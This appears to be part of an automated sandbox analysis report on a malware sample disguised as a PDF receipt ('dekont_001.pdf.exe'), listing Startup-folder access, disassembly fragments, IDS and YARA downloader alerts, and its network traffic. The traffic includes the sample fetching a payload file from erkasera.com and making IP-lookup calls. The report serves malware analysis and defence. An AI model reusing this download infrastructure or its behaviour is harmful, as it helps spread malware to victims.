Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: dekont_001.pdf.exe, 00000000.00000002.1761092855.000000000320D000.00000004.00000800.00020000.00000000.sdmp, dekont_001.pdf.exe, 00000000.00000002.1768060486.000000000409A000.00000004.00000800.00020000.00000000.sdmp, dekont_001.pdf.exe, 00000000.00000002.1769389020.0000000005E30000.00000004.08000000.00040000.00000000.sdmp, dekont_001.pdf.exe, 00000000.00000002.1768060486.0000000004022000.00000004.00000800.00020000.00000000.sdmp, Id.exe, 00000004.00000002.1946252341.00000000041E8000.00000004.00000800.00020000.00000000.sdmp, Id.exe, 00000004.00000002.1927771292.0000000003312000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: dekont_001.pdf.exe, dekont_001.pdf.exe, 00000000.00000002.1761092855.000000000320D000.00000004.00000800.00020000.00000000.sdmp, dekont_001.pdf.exe, 00000000.00000002.1768060486.000000000409A000.00000004.00000800.00020000.00000000.sdmp, dekont_001.pdf.exe, 00000000.00000002.1769389020.0000000005E30000.00000004.08000000.00040000.00000000.sdmp, dekont_001.pdf.exe, 00000000.00000002.1768060486.0000000004022000.00000004.00000800.00020000.00000000.sdmp, Id.exe, 00000004.00000002.1946252341.00000000041E8000.00000004.00000800.00020000.00000000.sdmp, Id.exe, 00000004.00000002.1927771292.0000000003312000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: dekont_001.pdf.exe, 00000000.00000002.1772053391.0000000006B60000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: dekont_001.pdf.exe, 00000000.00000002.1772053391.0000000006B60000.00000004.08000000.00040000.00000000.sdmp

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 00F8F206h	1_2_00F8F01F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 00F8FB90h	1_2_00F8F01F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	1_2_00F8E538
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	1_2_00F8EB6B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	1_2_00F8ED4C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 06641A38h	1_2_06641620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 066402F1h	1_2_06640040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 06641471h	1_2_066411C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 0664FD11h	1_2_0664FA68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 0664C8F1h	1_2_0664C648
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 06641A38h	1_2_06641617
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 0664F8B9h	1_2_0664F610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 0664D1A1h	1_2_0664CEF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 0664CD49h	1_2_0664CAA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 0664D5F9h	1_2_0664D350
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 0664DA51h	1_2_0664D7A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 0664E301h	1_2_0664E058
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 0664DEA9h	1_2_0664DC00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 0664B791h	1_2_0664B4E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 06640751h	1_2_066404A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 0664E759h	1_2_0664E4B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 06641A38h	1_2_06641966
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 06641011h	1_2_06640D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 0664F009h	1_2_0664ED60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 0664BBE9h	1_2_0664B940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 06640BB1h	1_2_06640900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 0664EBB1h	1_2_0664E908
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 0664C499h	1_2_0664C1F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 0664F461h	1_2_0664F1B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 0664C041h	1_2_0664BD98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 06678945h	1_2_06678608
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 066702E9h	1_2_06670040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 06675D19h	1_2_06675A70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 066758C1h	1_2_06675618
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 06676171h	1_2_06675EC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 06676A21h	1_2_06676778
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 066765C9h	1_2_06676320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 06676E79h	1_2_06676BD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	1_2_066733A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	1_2_066733B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 066772FAh	1_2_06677050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 06670B99h	1_2_066708F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 06677751h	1_2_066774A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 06670741h	1_2_06670498
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 06670FF1h	1_2_06670D48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 06678001h	1_2_06677D58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 06677BA9h	1_2_06677900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 06678459h	1_2_066781B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 06675441h	1_2_06675198
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 017DF1F6h	7_2_017DF007
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 017DFB80h	7_2_017DF007
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	7_2_017DE528
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 06B48945h	7_2_06B48608
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	7_2_06B436CE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 06B46171h	7_2_06B45EC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 06B458C1h	7_2_06B45618
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 06B46A21h	7_2_06B46778
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 06B47751h	7_2_06B474A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 06B40741h	7_2_06B40498
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 06B48001h	7_2_06B47D58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 06B40FF1h	7_2_06B40D48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 06B45D19h	7_2_06B45A70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	7_2_06B433B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	7_2_06B433A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 06B46E79h	7_2_06B46BD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 06B465C9h	7_2_06B46320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 06B40B99h	7_2_06B408F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 06B472FAh	7_2_06B47050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 06B402E9h	7_2_06B40040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 06B48459h	7_2_06B481B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 06B45441h	7_2_06B45198
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 06B47BA9h	7_2_06B47900

Networking

Yara detected Generic Downloader

Source: Yara match

File source: 0.2.dekont_001.pdf.exe.3e49550.4.raw.unpack, type: UNPACKEDPE

Source: global traffic	HTTP traffic detected: GET /seuias/Mfevxcugo.dat HTTP/1.1Host: erkasera.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /seuias/Mfevxcugo.dat HTTP/1.1Host: erkasera.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.org

Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 158.101.44.242 158.101.44.242

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49734 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49738 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49736 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49756 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49753 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49731 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49741 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49739 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49733 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49755 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49763 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49767 -> 188.114.97.3:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49732 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 192.168.2.4:49733 -> 188.114.97.3:443 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49754 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /seuias/Mfevxcugo.dat HTTP/1.1Host: erkasera.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /seuias/Mfevxcugo.dat HTTP/1.1Host: erkasera.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: erkasera.com
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org

Source: InstallUtil.exe, 00000001.00000002.2934160902.0000000002E7A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2934160902.0000000002DCB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2934160902.0000000002E87000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2934160902.0000000002E6C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2934160902.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2934160902.0000000002E5A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2934160902.0000000002EC3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2933316783.00000000032D5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2933316783.0000000003226000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2933316783.0000000003310000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2933316783.000000000331F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2933316783.00000000032E3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2933316783.00000000032C7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2933316783.00000000032B9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
